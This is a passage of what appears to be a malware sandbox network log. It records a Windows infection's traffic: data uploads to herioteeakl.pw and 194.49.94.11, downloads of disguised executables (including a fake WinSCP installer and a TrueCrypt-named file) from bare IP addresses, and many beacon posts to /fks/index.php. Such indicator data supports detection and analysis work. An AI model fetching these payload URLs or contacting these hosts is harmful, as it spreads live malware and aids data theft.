NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b526b5af26686-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 1440
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=9jspnb9rjtgm1seevtk74cr7g4; expires=Fri, 08 Mar 2024 18:47:52 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:13 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OcdCGDR8N%2BHQrmdq5fwNmloMX1mr6hhSYas5ZMhHoYsReavePJicihmXGnmDnk3GXqWsu0WyEuH%2BafcFK1nOqycgir3FbQUk%2Bncq2YtOiY8XAgReV5E1bXUSEviKtkRi2g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b526cafbf6724-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 352293
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=a3phe70df3e56utr2cmdhl0tnq; expires=Fri, 08 Mar 2024 18:47:53 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:14 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i15gtzQikdjW2WOvoCi5t%2Bd8o1rK5XpZCAbIjdc10Rpihfh1%2FSl7VdEJd64SAexacB3wwMkk7DIXNVlDmNUhhm7eQdHmE1s6c35W7zM4plDAqM0WGFH%2Bj54bfG7zH0%2Bvzw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b526f29cd0e81-AMS
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yxyikpfokyhvl.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://guwhsnhmhsk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 369
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xqsulgkygyigfo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 261
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hibtlxxdfestgs.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vtpunjvxdhheo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dsifwskhdvyt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 173
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 37
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://5.42.65.80/newrock.exe

Remote address:

5.42.65.80:80

Request

GET /newrock.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 14 Nov 2023 01:01:23 GMT
Content-Type: application/octet-stream
Content-Length: 7204352
Last-Modified: Mon, 13 Nov 2023 07:10:29 GMT
Connection: keep-alive
ETag: "6551cbe5-6dee00"
Accept-Ranges: bytes
DNS

190.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.92.42.5.in-addr.arpa

IN PTR

Response

190.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
GET

http://194.49.94.72/1.exe

Remote address:

194.49.94.72:80

Request

GET /1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.72

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:26 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 13 Nov 2023 14:22:32 GMT
ETag: "f42c00-60a09669c7f57"
Accept-Ranges: bytes
Content-Length: 16002048
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

72.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.94.49.194.in-addr.arpa

IN PTR

Response
POST

http://194.49.94.11/

5271.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 194.49.94.11
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 01:01:29 GMT
POST

http://194.49.94.11/

5271.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 194.49.94.11
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 01:01:34 GMT
POST

http://194.49.94.11/

5271.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 194.49.94.11
Content-Length: 3256383
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 01:01:40 GMT
POST

http://194.49.94.11/

5271.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 194.49.94.11
Content-Length: 3256375
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 01:01:40 GMT
DNS

11.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.94.49.194.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

5271.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/geoip

5271.exe

Remote address:

104.26.12.31:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:35 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 369
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uROEBUYEelo1V2j4pr8LCuhM95FwfDUYYo%2FR6Fm%2FNLO3H2gRdgimU5mFTHbRFsyYX7l7%2FzR9b4XGygJk2iAuUnfwES5m1nkBCjd0nqoEZkJszLMe%2FW4std3oVA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 825b52f83f675c49-AMS
alt-svc: h3=":443"; ma=86400
DNS

31.12.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.12.26.104.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sbgkiajaoymiw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 175
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fdetyljdwmito.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 275
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://asrsauquujeunrby.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 191
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dsofhrcmvkwnvp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 171
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cvnphiufeacab.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 296
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://votuusdhnlqriemb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 150
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eavkivhdiijg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 312
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hhvywiffvao.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 301
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 56
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rthkharaqkwa.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 332
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tnautoxwgcts.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 366
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:01:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 53
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

235.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.175.169.194.in-addr.arpa

IN PTR

Response
GET

http://194.169.175.118/traffico.exe

Remote address:

194.169.175.118:80

Request

GET /traffico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.169.175.118

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:56 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 13 Nov 2023 18:01:40 GMT
ETag: "63a00-60a0c76477a77"
Accept-Ranges: bytes
Content-Length: 408064
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

118.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.175.169.194.in-addr.arpa

IN PTR

Response
GET

http://179.61.246.174/WinSCP-6.1.2-Setup.exe

Remote address:

179.61.246.174:80

Request

GET /WinSCP-6.1.2-Setup.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 179.61.246.174

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Tue, 14 Nov 2023 01:01:56 GMT
Content-Type: application/octet-stream
Content-Length: 471040
Last-Modified: Mon, 13 Nov 2023 10:30:21 GMT
Connection: keep-alive
ETag: "6551fabd-73000"
Accept-Ranges: bytes
DNS

174.246.61.179.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.246.61.179.in-addr.arpa

IN PTR

Response
GET

http://194.49.94.120/TrueCrypt_KSfcnd.exe

Remote address:

194.49.94.120:80

Request

GET /TrueCrypt_KSfcnd.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.120

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:58 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 13 Nov 2023 21:42:01 GMT
ETag: "1180400-60a0f8a523bad"
Accept-Ranges: bytes
Content-Length: 18351104
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

120.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

120.94.49.194.in-addr.arpa

IN PTR

Response
DNS

80.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.94.49.194.in-addr.arpa

IN PTR

Response
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

95.214.26.28
POST

http://host-host-file8.com/

Remote address:

95.214.26.28:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://veufyt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 242
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Tue, 14 Nov 2023 01:02:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

28.26.214.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.26.214.95.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jplxedioksdypuu.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 110
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 01:02:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

4512c097-ea09-4b74-b6a1-3c92fa658275.uuid.theupdatetime.org

Remote address:

8.8.8.8:53

Request

4512c097-ea09-4b74-b6a1-3c92fa658275.uuid.theupdatetime.org

IN TXT

Response
DNS

16.205.10.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.205.10.195.in-addr.arpa

IN PTR

Response
DNS

1.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.173.189.20.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

stun2.l.google.com

Remote address:

8.8.8.8:53

Request

stun2.l.google.com

IN A

Response

stun2.l.google.com

IN A

142.251.125.127
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.135.233
DNS

server7.theupdatetime.org

Remote address:

8.8.8.8:53

Request

server7.theupdatetime.org

IN A

Response

server7.theupdatetime.org

IN A

185.82.216.108
DNS

127.125.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.125.251.142.in-addr.arpa

IN PTR

Response

127.125.251.142.in-addr.arpa

IN PTR

nh-in-f1271e100net
DNS

233.130.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.130.159.162.in-addr.arpa

IN PTR

Response
DNS

walkinglate.com

Remote address:

8.8.8.8:53

Request

walkinglate.com

IN A

Response

walkinglate.com

IN A

188.114.96.0

walkinglate.com

IN A

188.114.97.0
DNS

108.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.216.82.185.in-addr.arpa

IN PTR

Response

108.216.82.185.in-addr.arpa

IN PTR

dedic-mariadebommarez-1201693hosted-by-itldccom
DNS

0.96.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.96.114.188.in-addr.arpa

IN PTR

Response
DNS

108.230.249.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.230.249.199.in-addr.arpa

IN PTR

Response

108.230.249.199.in-addr.arpa

IN PTR

tor18quintexcom
DNS

148.230.249.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.230.249.199.in-addr.arpa

IN PTR

Response

148.230.249.199.in-addr.arpa

IN PTR

tor59quintexcom
DNS

178.31.136.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

178.31.136.45.in-addr.arpa

IN PTR

Response

178.31.136.45.in-addr.arpa

IN PTR

mailmy-mailrocks
DNS

95.9.222.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.9.222.51.in-addr.arpa

IN PTR

Response

95.9.222.51.in-addr.arpa

IN PTR

vps-3afadf7fvpsovhca
DNS

222.220.21.213.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.220.21.213.in-addr.arpa

IN PTR

Response

5.42.92.51:19057

AppLaunch.exe

156 B
3
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.5kB
2.7kB
9
9

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.3kB
18.9kB
21
19

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

30.3kB
1.8kB
27
17

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
